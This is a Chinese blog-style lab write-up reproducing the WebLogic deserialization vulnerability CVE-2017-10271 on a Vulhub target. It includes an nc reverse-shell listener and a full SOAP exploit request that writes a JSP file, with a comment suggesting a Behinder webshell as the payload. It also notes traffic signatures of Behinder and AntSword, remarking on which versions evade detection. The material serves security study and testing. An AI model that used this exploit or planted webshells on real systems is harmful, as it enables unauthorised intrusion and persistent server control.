weblogic反序列化漏洞(CVE-2017-10271)复现

直接用vuluhub搭建现成的靶场做

访问靶场

打开是这样表示成功

想反弹shell

就先开启kali1的nc监听,这就监听2233端口吧

linux:nc -l -p 2233

抓包修改为攻击数据包

ip和端口可以任意修改

反弹的shell

还可以写入文件shell

只需要把提供的poc

POST /wls-wsat/CoordinatorPortType HTTP/1.1

Host: your-ip:7001

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: text/xml

Content-Length: 638

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">

<soapenv:Header>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

<java><java version="1.4.0" class="java.beans.XMLDecoder">

<object class="java.io.PrintWriter">

<string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>

<void method="println"><string>

<![CDATA[
<% out.print("test"); %> #把这里替换成冰蝎的木马就可以了

]]>

</string>

</void>

<void method="close"/>

</object></java></java>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body/>

</soapenv:Envelope>

原理:Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML(SOAP协议)数据,在解析的过程中出现反序列化漏洞,导致任意代码执行。出问题的包是wls-wsat、_async。

冰蝎成功连接数

不愧是冰蝎4.0啊,吊特征都没有

冰蝎2.0有一个accept 里面有个 q=.2

冰蝎3.0就开始没有强特征了Content-Type: application/octet-stream

就这一个若特征

换上蚁剑在抓个包看看

蚁剑比较有趣了

蚁剑

base64加密的值,但需要去掉前面两个字母才是密文

强特征,ua投的antsword和@ini_set("display_errors", "0");@set_time_limit(0)

ping

an

相关推荐
代码游侠1 分钟前
应用——文件I/O操作代码
linux·运维·c语言·笔记·学习·算法
未来之窗软件服务3 分钟前
幽冥大陆(四十五)人工智能自动化交互系统ASR——东方仙盟筑基期
运维·自动化·asr·仙盟创梦ide·东方仙盟·东方仙盟sdk·东方仙盟自动化
小婷要努力8 分钟前
Linux常用命令速查表
linux·运维·服务器
爱宇阳9 分钟前
Jenkins 多语言 Agent 完整部署教程
运维·servlet·jenkins
微风◝13 分钟前
AlmaLinux9-网络管理篇-更改网络接口名称
linux·运维·网络
tianyuanwo13 分钟前
Ansible构建节点管理:Koji与Mock构建节点的自动化运维实践
运维·自动化·ansible
怀旧,18 分钟前
【Linux系统编程】10. 进程控制(下)
linux·运维·服务器
wanhengidc22 分钟前
云手机 科技展现
服务器·科技·安全·游戏·智能手机
Evan芙22 分钟前
DNS域名三级结构,DNS服务工作原理,涉及递归和迭代查询原理总结
linux·运维·服务器
CIb0la31 分钟前
Microsoft Excel 已经40岁了
运维·智能手机·生活